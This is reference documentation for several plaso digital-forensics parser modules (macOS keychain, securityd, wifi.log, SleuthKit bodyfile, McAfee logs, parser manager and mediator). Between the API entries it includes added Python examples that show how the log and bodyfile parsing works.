Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• line (str) – line from a text file.
Returns True if the line is in the expected format, False if not.
Return type bool
plaso.parsers.mac_keychain module
Parser for MacOS keychain database files.
class plaso.parsers.mac_keychain.KeychainApplicationRecordEventData
Bases: plaso.containers.events.EventData
MacOS keychain application password record event data.
account_name: name of the account.
Type str
comments: comments added by the user.
Type str
entry_name: name of the entry.
Type str
ssgp_hash: password/certificate hash formatted as a hexadecimal string.
Type str
text_description: description.
Type str
DATA_TYPE = 'mac:keychain:application'
class plaso.parsers.mac_keychain.KeychainDatabaseColumn
Bases: object
MacOS keychain database column.
attribute_data_type: attribute (data) type.
Type int
attribute_identifier: attribute identifier.
Type int
attribute_name: attribute name.
Type str
class plaso.parsers.mac_keychain.KeychainDatabaseTable
Bases: object
MacOS keychain database table.
columns: columns.
Type list[KeychainDatabaseColumn]
records: records.
Type list[dict[str, str]]
relation_identifier: relation identifier.
Type int
relation_name: relation name.
Type str
class plaso.parsers.mac_keychain.KeychainInternetRecordEventData
Bases: plaso.containers.events.EventData
MacOS keychain internet record event data.
account_name: name of the account.
Type str
comments: comments added by the user.
Type str
entry_name: name of the entry.
Type str
protocol: internet protocol used, for example “https”.
Type str
ssgp_hash: password/certificate hash formatted as a hexadecimal string.
Type str
text_description: description.
Type str
type_protocol: sub-protocol used, for example “form”.
Type str
where: domain name or IP where the password is used.
Type str
DATA_TYPE = 'mac:keychain:internet'
class plaso.parsers.mac_keychain.KeychainParser
Bases: plaso.parsers.dtfabric_parser.DtFabricBaseParser
Parser for MacOS keychain database files.
DATA_FORMAT = 'MacOS keychain database file'
classmethod GetFormatSpecification()
Retrieves the format specification.
Returns format specification.
Return type FormatSpecification
NAME = 'mac_keychain'
ParseFileObject(parser_mediator, file_object)
Parses a MacOS keychain file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – a file-like object.
Raises UnableToParseFile – when the file cannot be parsed.
plaso.parsers.mac_securityd module
Parses MacOS security daemon (securityd) log files.
Also see: http://opensource.apple.com/source/Security/Security-55471/sec/securityd/
class plaso.parsers.mac_securityd.MacOSSecuritydLogEventData
Bases: plaso.containers.events.EventData
MacOS securityd log event data.
caller: caller, consists of two hex numbers.
Type str
facility: facility.
Type str
level: priority level.
Type str
message: message.
Type str
security_api: name of securityd function.
Type str
sender_pid: process identifier of the sender.
Type int
sender: name of the sender.
Type str
DATA_TYPE = 'mac:securityd:line'
class plaso.parsers.mac_securityd.MacOSSecuritydLogParser
Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser
Parses MacOS security daemon (securityd) log files.
DATA_FORMAT = 'MacOS security daemon (securityd) log file'
DATE_TIME = Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}})
LINE_STRUCTURES = [('logline', {{{{{{{{{{{{{{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) !W:([)} Suppress:("[")} W:(0123...)} Suppress:("]")} Suppress:("<")} !W:(>)} Suppress:(">")} Suppress:("[")} !W:({)} Suppress:("{")} [!W:(})]} Suppress:("}")} [!W:(]:)]} Suppress:("]:")} SkipTo:(lineEnd)}), ('repeated', {{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) Suppress:("--- last message repeated")} W:(0123...)} Suppress:("time ---")})]
NAME = 'mac_securityd'
ParseRecord(parser_mediator, key, structure)
Parses a log record structure and produces events.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• key (str) – name of the parsed structure.
• structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file.
Raises ParseError – when the structure type is unknown.
REPEATED_LINE = {{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) Suppress:("--- last message repeated")} W:(0123...)} Suppress:("time ---")}
SECURITYD_LINE = {{{{{{{{{{{{{{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) !W:([)} Suppress:("[")} W:(0123...)} Suppress:("]")} Suppress:("<")} !W:(>)} Suppress:(">")} Suppress:("[")} !W:({)} Suppress:("{")} [!W:(})]} Suppress:("}")} [!W:(]:)]} Suppress:("]:")} SkipTo:(lineEnd)}
VerifyStructure(parser_mediator, line)
Verify that this file is a securityd log file.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• line (str) – line from a text file.
Returns True if the line is in the expected format, False if not.
Return type bool
plaso.parsers.mac_wifi module
Parsers for MacOS Wifi log (wifi.log) files.
class plaso.parsers.mac_wifi.MacWifiLogEventData
Bases: plaso.containers.events.EventData
Mac Wifi log event data.
action: known WiFi action, for example connected to an AP, configured, etc. If the action is not known, the value is the message of the log (text variable).
Type str
agent: name and identifier of process that generated the log message.
Type str
function: name of function that generated the log message.
Type str
text: log message.
Type str
DATA_TYPE = 'mac:wifilog:line'
class plaso.parsers.mac_wifi.MacWifiLogParser
Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser
Parses MacOS Wifi log (wifi.log) files.
DATA_FORMAT = 'MacOS Wifi log (wifi.log) file'
LINE_STRUCTURES = [('header', {Group:({{{{{W:(ABCD...) W:(ABCD...)} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} Suppress:(".")} W:(0123...)}) "***Starting Up***"}), ('turned_over_header', {Group:({{W:(ABCD..., abcd...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) Combine:({{{W:(0123...) W:(0123...)} "logfile turned over"} LineEnd})}), ('known_function_logline', {{{{Group:({{{{{W:(ABCD...) W:(ABCD...)} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} Suppress:(".")} W:(0123...)}) {{"<" Combine:({"airportd" !W:(>)})} ">"}} airportdProcessDLILEvent | _doAutoJoin | _processSystemPSKAssoc} ":"} SkipTo:(lineEnd)}), ('logline', {{Group:({{{{{W:(ABCD...) W:(ABCD...)} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} Suppress:(".")} W:(0123...)}) ~{{{{{"<" Combine:({"airportd" !W:(>)})} ">"} airportdProcessDLILEvent | _doAutoJoin | _processSystemPSKAssoc} ":"}}} SkipTo:(lineEnd)})]
NAME = 'macwifi'
ParseRecord(parser_mediator, key, structure)
Parses a log record structure and produces events.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• key (str) – name of the parsed structure.
• structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file.
Raises ParseError – when the structure type is unknown.
THREE_DIGITS = W:(0123...)
THREE_LETTERS = W:(ABCD...)
VerifyStructure(parser_mediator, line)
Verify that this file is a Mac Wifi log file.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• line (str) – line from a text file.
Returns True if the line is in the expected format, False if not.
Return type bool
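The two methods above are the whole contract of a single-line text parser: VerifyStructure decides, from one line, whether the parser should claim the file at all, and ParseRecord turns each matched structure into an event. The following is an added example (not code from plaso) that mirrors that contract for the wifi.log layout described by LINE_STRUCTURES, using plain regular expressions instead of pyparsing. The sample lines, SSID, interface name, process id and timestamps are constructed; the year parameter stands in for the year the mediator supplies, because wifi.log timestamps carry none; the rules in _action are this example's own reading of the messages, not plaso's; and the "***Starting Up***" header is skipped rather than turned into an event.

```python
import re
from datetime import datetime

# Constructed wifi.log excerpt in the layout LINE_STRUCTURES describes:
# "<weekday> <month> <day> HH:MM:SS.mmm <agent[pid]> function: message".
# SSID, interface name, process id and timestamps are made up.
SAMPLE_LOG = """\
Thu Nov 14 20:36:37.222 ***Starting Up***
Thu Nov 14 20:36:37.222 <airportd[88]> _doAutoJoin: Already associated to "CampusNet". Bailing on auto-join.
Thu Nov 14 21:50:52.395 <airportd[88]> airportdProcessDLILEvent: en0 attached (up)
Thu Nov 14 21:50:52.401 <airportd[88]> _processSystemPSKAssoc: No password for network [ssid=CampusNet] in the system keychain
Thu Nov 14 21:51:02.001 <kernel> wl0: setting auto-roam threshold
"""

# Functions the 'known_function_logline' structure singles out.
KNOWN_FUNCTIONS = ('airportdProcessDLILEvent', '_doAutoJoin', '_processSystemPSKAssoc')

# Timestamp prefix shared by every structure. There is no year in the file.
_TS = (r'(?P<weekday>[A-Z][a-z]{2}) (?P<month>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) '
       r'(?P<hour>\d{2}):(?P<minute>\d{2}):(?P<second>\d{2})\.(?P<ms>\d{1,3})')
HEADER_RE = re.compile(_TS + r' \*\*\*Starting Up\*\*\*$')
LOGLINE_RE = re.compile(_TS + r' (?P<rest>.*)$')
AGENT_RE = re.compile(r'^<(?P<agent>[^>]+)> (?:(?P<function>\w+): )?(?P<text>.*)$')


def _timestamp(match, year):
    """Build a datetime from the matched fields; 'year' is supplied by the caller
    (plaso takes it from the mediator) because wifi.log omits it."""
    fields = match.groupdict()
    try:
        stamp = datetime.strptime(
            '{0:d} {month} {day} {hour}:{minute}:{second}'.format(year, **fields),
            '%Y %b %d %H:%M:%S')
    except ValueError:  # impossible date such as "Feb 30" or an unknown month
        return None
    return stamp.replace(microsecond=int(fields['ms'].ljust(3, '0')) * 1000)


def verify_structure(first_line, year):
    """Mirror of VerifyStructure: claim the file only if the first line is a
    header or log line whose timestamp is a real date."""
    match = HEADER_RE.match(first_line) or LOGLINE_RE.match(first_line)
    return match is not None and _timestamp(match, year) is not None


def _action(function, text):
    """Derive the 'action' attribute. These rules are this example's own reading
    of the messages; an unknown message falls back to the text itself."""
    if function == '_doAutoJoin':
        ssid = re.search(r'Already associated to "([^"]+)"', text)
        if ssid:
            return 'Wifi connected to SSID {0:s}'.format(ssid.group(1))
    elif function == 'airportdProcessDLILEvent':
        iface = re.match(r'(\w+) attached \((up|down)\)', text)
        if iface:
            return 'Interface {0:s} turned {1:s}'.format(*iface.groups())
    elif function == '_processSystemPSKAssoc':
        ssid = re.search(r'ssid=([^\],]+)', text)
        if ssid:
            return 'No password for SSID {0:s} in the system keychain'.format(ssid.group(1))
    return text


def parse_record(line, year):
    """Mirror of ParseRecord: return (timestamp, event_data) for a log line,
    or None for the start-up header and anything that does not match."""
    if HEADER_RE.match(line):
        return None
    match = LOGLINE_RE.match(line)
    if match is None:
        return None
    timestamp = _timestamp(match, year)
    if timestamp is None:
        return None
    agent = function = None
    text = match['rest']
    agent_match = AGENT_RE.match(text)
    if agent_match:
        agent = agent_match['agent']
        if agent_match['function'] in KNOWN_FUNCTIONS:
            function = agent_match['function']
            text = agent_match['text']
        else:  # generic 'logline': keep everything after the agent as text
            text = text[len(agent) + 3:]
    event_data = {
        'data_type': 'mac:wifilog:line',
        'action': _action(function, text),
        'agent': agent,
        'function': function,
        'text': text,
    }
    return timestamp, event_data


def parse_log(log_text, year):
    """Parse a whole wifi.log; ValueError when VerifyStructure would reject it."""
    lines = log_text.splitlines()
    if not lines or not verify_structure(lines[0], year):
        raise ValueError('not a wifi.log file')
    records = (parse_record(line, year) for line in lines)
    return [record for record in records if record is not None]
```

The year check inside verify_structure is the part worth copying: a line that looks right but names an impossible date (a February 30th, a bogus month) is rejected before the parser claims the file, which is what keeps a single-line text parser from being fooled by lookalike logs.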
plaso.parsers.mactime module
Parser for the Sleuthkit (TSK) bodyfile or mactime format.
The format specifications can be read here: http://wiki.sleuthkit.org/index.php?title=Body_file
class plaso.parsers.mactime.MactimeEventData
Bases: plaso.containers.events.EventData
Mactime event data.
filename: name of the file.
Type str
inode: “inode” of the file. Note that inode is an overloaded term in the context of mactime and is used for MFT entry index values as well.
Type int
md5: MD5 hash of the file content, formatted as a hexadecimal string.
Type str
mode_as_string: protection mode.
Type str
offset: number of the corresponding line.
Type int
size: size of the file content.
Type int
user_gid: user group identifier (GID).
Type int
user_sid: user security identifier (SID).
Type str
DATA_TYPE = 'fs:mactime:line'
class plaso.parsers.mactime.MactimeParser(encoding=None)
Bases: plaso.parsers.dsv_parser.DSVParser
SleuthKit bodyfile parser.
COLUMNS = ['md5', 'name', 'inode', 'mode_as_string', 'uid', 'gid', 'size', 'atime', 'mtime', 'ctime', 'btime']
DATA_FORMAT = 'SleuthKit version 3 bodyfile'
DELIMITER = '|'
ESCAPE_CHARACTER = '\\'
NAME = 'mactime'
ParseRow(parser_mediator, row_offset, row)
Parses a line of the log file and produces events.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• row_offset (int) – number of the corresponding line.
• row (dict[str, str]) – fields of a single row, as specified in COLUMNS.
VerifyRow(parser_mediator, row)
Verifies if a line of the file is in the expected format.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• row (dict[str, str]) – fields of a single row, as specified in COLUMNS.
Returns True if this is the correct parser, False otherwise.
Return type bool
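The DSV parser contract is the same shape as the single-line text one: VerifyRow looks at one split row and decides whether the file is this format, ParseRow turns each row into events. The following added example (not plaso's code) parses a SleuthKit version 3 bodyfile with the COLUMNS, DELIMITER and ESCAPE_CHARACTER values listed above, letting the csv module do the escape handling. The two-row bodyfile is constructed; the event description per timestamp column is this example's choice; a zero timestamp is treated as unset and produces no event; and an NTFS-style "entry-sequence-attribute" inode is reduced to its entry index so it fits the int inode attribute, which is the overloading the note above refers to.

```python
import csv
import io
from datetime import datetime, timezone

# Column order of a SleuthKit version 3 bodyfile (the parser's COLUMNS).
COLUMNS = ['md5', 'name', 'inode', 'mode_as_string', 'uid', 'gid', 'size',
           'atime', 'mtime', 'ctime', 'btime']
DELIMITER = '|'
ESCAPE_CHARACTER = '\\'
# Which event each POSIX timestamp column becomes; the labels are this example's.
TIMESTAMP_LABELS = {'atime': 'Last Access Time',
                    'mtime': 'Content Modification Time',
                    'ctime': 'Metadata Modification Time',
                    'btime': 'Creation Time'}

# Constructed two-row bodyfile: the second row has an escaped '|' in its name,
# an NTFS-style "entry-sequence-attribute" inode and no creation time (0).
SAMPLE_BODYFILE = (
    '0|/home/alice/.bash_history|131074|r/rrw-------|1000|1000|2048'
    '|1601510400|1601424000|1601424000|1598918400\n'
    'd41d8cd98f00b204e9800998ecf8427e|/Windows/System32/odd\\|name.dll|91234-128-3'
    '|r/rrwxrwxrwx|0|0|0|1601596800|1601596800|1601596800|0\n')


def read_rows(text):
    """Split bodyfile text into field lists. The csv module does the escape
    handling: a '|' preceded by '\\' stays inside the file name."""
    reader = csv.reader(io.StringIO(text), delimiter=DELIMITER,
                        escapechar=ESCAPE_CHARACTER, quoting=csv.QUOTE_NONE)
    return [fields for fields in reader if fields]


def verify_row(fields):
    """Mirror of VerifyRow: column count, md5 is '0' or 32 hex digits, and the
    numeric columns are unsigned integers."""
    if len(fields) != len(COLUMNS):
        return False
    row = dict(zip(COLUMNS, fields))
    md5 = row['md5'].lower()
    if md5 != '0' and not (len(md5) == 32 and all(c in '0123456789abcdef' for c in md5)):
        return False
    return all(row[key].isdigit()
               for key in ('uid', 'gid', 'size', 'atime', 'mtime', 'ctime', 'btime'))


def parse_row(row_offset, fields):
    """Mirror of ParseRow: one (timestamp, description, event_data) tuple per
    non-zero timestamp column; a zero column means 'not set' and yields nothing."""
    row = dict(zip(COLUMNS, fields))
    inode = row['inode']
    if '-' in inode:  # MFT entry form: keep the entry index (the overloaded "inode")
        inode = inode.split('-', 1)[0]
    event_data = {
        'data_type': 'fs:mactime:line',
        'filename': row['name'],
        'inode': int(inode),
        'md5': None if row['md5'] == '0' else row['md5'].lower(),
        'mode_as_string': row['mode_as_string'],
        'offset': row_offset,
        'size': int(row['size']),
        'user_gid': int(row['gid']),
        'user_sid': row['uid'],
    }
    events = []
    for column, description in TIMESTAMP_LABELS.items():
        posix_time = int(row[column])
        if posix_time == 0:
            continue
        timestamp = datetime.fromtimestamp(posix_time, tz=timezone.utc)
        events.append((timestamp, description, event_data))
    return events


def parse_bodyfile(text):
    """Parse a whole bodyfile; ValueError when the first row fails VerifyRow."""
    rows = read_rows(text)
    if not rows or not verify_row(rows[0]):
        raise ValueError('not a SleuthKit version 3 bodyfile')
    events = []
    for row_offset, fields in enumerate(rows, 1):
        if verify_row(fields):  # skip malformed rows instead of aborting
            events.extend(parse_row(row_offset, fields))
    return events
```

Two details matter when you generate bodyfiles for plaso yourself: a '|' in a path must be escaped or the row silently gains a column and fails VerifyRow, and timestamps are POSIX seconds in UTC, so a tool that writes local time will shift every event by the host's offset.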
plaso.parsers.manager module
The parsers and plugins manager.
class plaso.parsers.manager.ParsersManager
Bases: object
The parsers and plugins manager.
classmethod CheckFilterExpression(parser_filter_expression)
Checks parser and plugin names in a parser filter expression.
Parameters parser_filter_expression (str) – parser filter expression, where None represents all parsers and plugins.
A parser filter expression is a comma separated value string that denotes which parsers and plugins should be used. See filters/parser_filter.py for details of the expression syntax.
This function does not support presets, and requires a parser filter expression where presets have been expanded.
Returns
containing:
• set(str): parser filter expression elements that contain known parser and/or plugin names.
• set(str): parser filter expression elements that contain unknown parser and/or plugin names.
Return type tuple
classmethod CreateSignatureScanner(specification_store)
Creates a signature scanner for format specifications with signatures.
Parameters specification_store (FormatSpecificationStore) – format specifications with signatures.
Returns signature scanner.
Return type pysigscan.scanner
classmethod DeregisterParser(parser_class)
Deregisters a parser class.
The parser classes are identified based on their lower case name.
Parameters parser_class (type) – parser class (subclass of BaseParser).
Raises KeyError – if parser class is not set for the corresponding name.
classmethod GetFormatsWithSignatures(parser_filter_expression=None)
Retrieves the format specifications that have signatures.
This method will create a specification store for parsers that define a format specification with signatures and a list of parser names for those that do not.
Parameters parser_filter_expression (Optional[str]) – parser filter expression, where None represents all parsers and plugins.
A parser filter expression is a comma separated value string that denotes which parsers and plugins should be used. See filters/parser_filter.py for details of the expression syntax.
This function does not support presets, and requires a parser filter expression where presets have been expanded.
Returns
containing:
• FormatSpecificationStore: format specifications with signatures.
• list[str]: names of parsers that do not have format specifications with signatures, or have signatures but also need to be applied ‘brute force’.
Return type tuple
classmethod GetNamesOfParsersWithPlugins()
Retrieves the names of all parsers with plugins.
Returns names of all parsers with plugins.
Return type list[str]
classmethod GetParserAndPluginNames(parser_filter_expression=None)
Retrieves the parser and parser plugin names.
Parameters parser_filter_expression (Optional[str]) – parser filter expression, where None represents all parsers and plugins.
A parser filter expression is a comma separated value string that denotes which parsers and plugins should be used. See filters/parser_filter.py for details of the expression syntax.
This function does not support presets, and requires a parser filter expression where presets have been expanded.
Returns parser and parser plugin names.
Return type list[str]
classmethod GetParserObjectByName(parser_name)
Retrieves a specific parser object by its name.
Parameters parser_name (str) – name of the parser.
Returns parser object or None.
Return type BaseParser
classmethod GetParserObjects(parser_filter_expression=None)
Retrieves the parser objects.
Parameters parser_filter_expression (Optional[str]) – parser filter expression, where None represents all parsers and plugins.
A parser filter expression is a comma separated value string that denotes which parsers and plugins should be used. See filters/parser_filter.py for details of the expression syntax.
This function does not support presets, and requires a parser filter expression where presets have been expanded.
Returns parsers per name.
Return type dict[str, BaseParser]
classmethod GetParserPluginsInformation(parser_filter_expression=None)
Retrieves the parser plugins information.
Parameters parser_filter_expression (Optional[str]) – parser filter expression, where None represents all parsers and plugins.
A parser filter expression is a comma separated value string that denotes which parsers and plugins should be used. See filters/parser_filter.py for details of the expression syntax.
This function does not support presets, and requires a parser filter expression where presets have been expanded.
Returns pairs of parser plugin names and descriptions.
Return type list[tuple[str, str]]
classmethod GetParsersInformation()
Retrieves the parsers information.
Returns parser names and descriptions.
Return type list[tuple[str, str]]
classmethod RegisterParser(parser_class)
Registers a parser class.
The parser classes are identified based on their lower case name.
Parameters parser_class (type) – parser class (subclass of BaseParser).
Raises KeyError – if parser class is already set for the corresponding name.
classmethod RegisterParsers(parser_classes)
Registers parser classes.
The parser classes are identified based on their lower case name.
Parameters parser_classes (list[type]) – parser classes (subclasses of BaseParser).
Raises KeyError – if a parser class is already set for the corresponding name.
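The parser filter expression these methods keep pointing at (filters/parser_filter.py) is the value the --parsers option of log2timeline takes: comma separated elements, each a parser name or a parser/plugin pair, with a leading ! turning the element into an exclusion. The following added example (not plaso's code) models CheckFilterExpression and GetParserAndPluginNames against a small hypothetical registry, so the include/exclude semantics can be exercised without plaso installed. The parser and plugin names in REGISTRY are illustrative, and presets are not expanded, in line with the docstrings above.

```python
# Hypothetical registry standing in for ParsersManager's internal tables:
# parser name -> set of its plugin names (empty set: a parser without plugins).
# The names are illustrative; only the expression semantics matter here.
REGISTRY = {
    'mactime': set(),
    'mcafee_protection': set(),
    'sqlite': {'chrome_27_history', 'firefox_history', 'skype'},
    'winreg': {'bagmru', 'userassist'},
}


def split_filter_expression(expression):
    """Split a comma separated expression into (includes, excludes). An element
    is "parser" or "parser/plugin"; a leading "!" makes it an exclusion."""
    includes, excludes = set(), set()
    for element in (expression or '').split(','):
        element = element.strip()
        if not element:
            continue
        if element.startswith('!'):
            excludes.add(element[1:])
        else:
            includes.add(element)
    return includes, excludes


def check_filter_expression(expression):
    """Mirror of CheckFilterExpression: returns (known, unknown) element sets.
    Presets are not expanded, so an unexpanded preset name shows up as unknown."""
    known, unknown = set(), set()
    includes, excludes = split_filter_expression(expression)
    for element in includes | excludes:
        parser_name, _, plugin_name = element.partition('/')
        plugins = REGISTRY.get(parser_name)
        if plugins is None or (plugin_name and plugin_name not in plugins):
            unknown.add(element)
        else:
            known.add(element)
    return known, unknown


def get_parser_and_plugin_names(expression=None):
    """Mirror of GetParserAndPluginNames: expand the expression into the sorted
    list of "parser" and "parser/plugin" names it selects. No includes means
    every registered parser; "parser" alone selects the parser with all of its
    plugins; "parser/plugin" selects the parser with only that plugin; the
    exclusions are applied last, so "!parser" drops its plugins as well."""
    includes, excludes = split_filter_expression(expression)
    wanted = {element.partition('/')[0] for element in includes} or set(REGISTRY)
    selected = set()
    for parser_name in wanted:
        plugins = REGISTRY.get(parser_name)
        if plugins is None:  # unknown names are ignored here; check_filter_expression reports them
            continue
        whole_parser = not includes or parser_name in includes
        selected.add(parser_name)
        for plugin_name in plugins:
            element = '{0:s}/{1:s}'.format(parser_name, plugin_name)
            if whole_parser or element in includes:
                selected.add(element)
    for element in excludes:
        parser_name, _, plugin_name = element.partition('/')
        if plugin_name:
            selected.discard(element)
        else:
            selected = {name for name in selected if name.partition('/')[0] != parser_name}
    return sorted(selected)
```

Running check_filter_expression before a long extraction is the cheap safeguard: a misspelled plugin name is not an error at the command line, it simply never runs, and the gap only shows up when the timeline is missing a source.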
plaso.parsers.mcafeeav module
Parser for McAfee Anti-Virus Logs.
McAfee AV uses 4 logs to track when scans were run, when virus databases were updated, and when files match the virus database.
class plaso.parsers.mcafeeav.McafeeAVEventData
Bases: plaso.containers.events.EventData
McAfee AV Log event data.
action: action.
Type str
filename: filename.
Type str
rule: rule.
Type str
status: status.
Type str
trigger_location: trigger location.
Type str
username: username.
Type str
DATA_TYPE = 'av:mcafee:accessprotectionlog'
class plaso.parsers.mcafeeav.McafeeAccessProtectionParser(encoding=None)
Bases: plaso.parsers.dsv_parser.DSVParser
Parses the McAfee AV Access Protection Log.
COLUMNS = ['date', 'time', 'status', 'username', 'filename', 'trigger_location', 'rule', 'action']
DATA_FORMAT = 'McAfee Anti-Virus access protection log file'
DELIMITER = '\t'
NAME = 'mcafee_protection'
ParseRow(parser_mediator, row_offset, row)
Parses a line of the log file and produces events.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• row_offset (int) – line number of the row.
• row (dict[str, str]) – fields of a single row, as specified in COLUMNS.
VerifyRow(parser_mediator, row)
Verifies if a line of the file is in the expected format.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• row (dict[str, str]) – fields of a single row, as specified in COLUMNS.
Returns True if this is the correct parser, False otherwise.
Return type bool
plaso.parsers.mediator module
The parser mediator.
class plaso.parsers.mediator.ParserMediator(storage_writer, knowledge_base, collection_filters_helper=None, preferred_year=None, resolver_context=None, temporary_directory=None)
Bases: object
Parser mediator.
collection_filters_helper: collection filters helper.
Type CollectionFiltersHelper
last_activity_timestamp: timestamp received that indicates the last time activity was observed. The last activity timestamp is updated when the mediator produces an attribute container, such as an event source. This timestamp is used by the multi processing worker process to indicate the last time the worker was known to be active. This information is then used by the foreman to detect workers that are not responding (stalled).
Type int
AddEventAttribute(attribute_name, attribute_value)
Adds an attribute that will be set on all events produced.
Setting attributes using this method will cause events produced via this mediator to have an attribute with the provided name set with the provided value.
Parameters
• attribute_name (str) – name of the attribute to add.
• attribute_value (str) – value of the attribute to add.
Raises KeyError – if the event attribute is already set.
AppendToParserChain(plugin_or_parser)
Adds a parser or parser plugin to the parser chain.
Parameters plugin_or_parser (BaseParser) – parser or parser plugin.
ClearEventAttributes()
Clears the extra event attributes.
ClearParserChain()
Clears the parser chain.
GetCurrentYear()
Retrieves the current year.
Returns the current year.
Return type int
GetDisplayName(file_entry=None)
Retrieves the display name for a file entry.
Parameters file_entry (Optional[dfvfs.FileEntry]) – file entry object, where None will return the display name of self._file_entry.
Returns human readable string that describes the path to the file entry.
Return type str
Raises ValueError – if the file entry is missing.
GetDisplayNameForPathSpec(path_spec)
Retrieves the display name for a path specification.
Parameters path_spec (dfvfs.PathSpec) – path specification.
Returns human readable version of the path specification.
Return type str
GetEstimatedYear()
Retrieves an estimate of the year.
This function determines the year in the following order, using the first source that yields one:
• a preferred year provided by the user;
• a year derived from preprocessing, as defined in the knowledge base;
• the year taken from the file entry metadata;
• otherwise the current year.
Returns estimated year.
Return type int
GetFileEntry()
Retrieves the active file entry.
Returns file entry.
Return type dfvfs.FileEntry
GetFilename()
Retrieves the name of the active file entry.
Returns name of the active file entry or None.
Return type str
GetLatestYear()
Retrieves the latest (newest) year for an event from a file.
This function tries to determine the year based on the file entry metadata; if that fails the current year is used.
Returns year of the file entry or the current year.
Return type int
GetParserChain()
Retrieves the current parser chain.
Returns parser chain.
Return type str
GetRelativePath()
Retrieves the relative path of the current file entry.
Returns relative path of the current file entry or None if there is no current file entry.
Return type str
GetRelativePathForPathSpec(path_spec)
Retrieves the relative path for a path specification.
Parameters path_spec (dfvfs.PathSpec) – path specification.
Returns relative path of the path specification.
Return type str
PopFromParserChain()
Removes the last added parser or parser plugin from the parser chain.
ProcessEventData(event_data, parser_chain=None, file_entry=None, query=None)
Processes event data before it is written to the storage.
Parameters
• event_data (EventData) – event data.
• parser_chain (Optional[str]) – parsing chain up to this point.
• file_entry (Optional[dfvfs.FileEntry]) – file entry, where None will use the current file entry set in the mediator.
• query (Optional[str]) – query that was used to obtain the event data.
Raises KeyError – if there’s an attempt to add a duplicate attribute value to the event data.
ProduceEventDataStream(event_data_stream)
Produces an event data stream.
Parameters event_data_stream (EventDataStream) – an event data stream or None if no event data stream is needed.
Raises RuntimeError – when storage writer is not set.
ProduceEventSource(event_source)
Produces an event source.
Parameters event_source (EventSource) – an event source.
Raises RuntimeError – when storage writer is not set.
ProduceEventWithEventData(event, event_data)
Produces an event.
Parameters
• event (EventObject) – event.
• event_data (EventData) – event data.
Raises InvalidEvent – if the event timestamp value is not set or out of bounds, or if the event data (attribute container) values cannot be hashed.
ProduceExtractionWarning(message, path_spec=None)
Produces an extraction warning.
Parameters
• message (str) – message of the warning.
• path_spec (Optional[dfvfs.PathSpec]) – path specification, where None will use the path specification of the current file entry set in the mediator.
Raises RuntimeError – when storage writer is not set.
RemoveEventAttribute(attribute_name)
Removes an attribute from being set on all events produced.
Parameters attribute_name (str) – name of the attribute to remove.
Raises KeyError – if the event attribute is not set.
ResetFileEntry()
Resets the active file entry.
SampleMemoryUsage(parser_name)
Takes a sample of the memory usage for profiling.
Parameters parser_name (str) – name of the parser.
SampleStartTiming(parser_name)
Starts timing a CPU time sample for profiling.
Parameters parser_name (str) – name of the parser.
SampleStopTiming(parser_name)
Stops timing a CPU time sample for profiling.
Parameters parser_name (str) – name of the parser.
SetFileEntry(file_entry)
Sets the active file entry.
Parameters file_entry (dfvfs.FileEntry) – file entry.
SetStorageWriter(storage_writer)
Sets the storage writer.
Parameters storage_writer (StorageWriter) – storage writer.
SignalAbort()
Signals the parsers to abort.
StartProfiling(configuration, identifier, process_information)
Starts profiling.
Parameters
• configuration (ProfilingConfiguration) – profiling configuration.
• identifier (str) – identifier of the profiling session used to create the sample filename.
• process_information (ProcessInfo) – process information.
StopProfiling()
Stops profiling.
property abort
True if parsing should be aborted.
Type bool
property codepage
codepage.
Type str
property hostname
hostname.
Type str
property knowledge_base
knowledge base.
Type KnowledgeBase
property number_of_produced_event_sources
number of produced event sources.
Type int
property number_of_produced_events
number of produced events.
Type int
property number_of_produced_warnings
number of produced warnings.
Type int
property operating_system
operating system or None if not set.
Type str
property resolver_context
resolver context.
Type dfvfs.Context
property temporary_directory
path of the directory for temporary files.
Type str
property timezone
timezone.
Type datetime.tzinfo
property year
year.
Type int
plaso.parsers.msiecf module
Parser for Microsoft Internet Explorer (MSIE) Cache Files (CF).
class plaso.parsers.msiecf.MSIECFLeakEventData
Bases: plaso.containers.events.EventData
MSIECF leak event data.
cached_filename: name of the cached file.
Type str
cached_file_size: size of the cached file.
Type int
cache_directory_index: index of the cache directory.
Type int
cache_directory_name: name of the cache directory.
Type str
recovered: True if the item was recovered.
Type bool
DATA_TYPE = 'msiecf:leak'
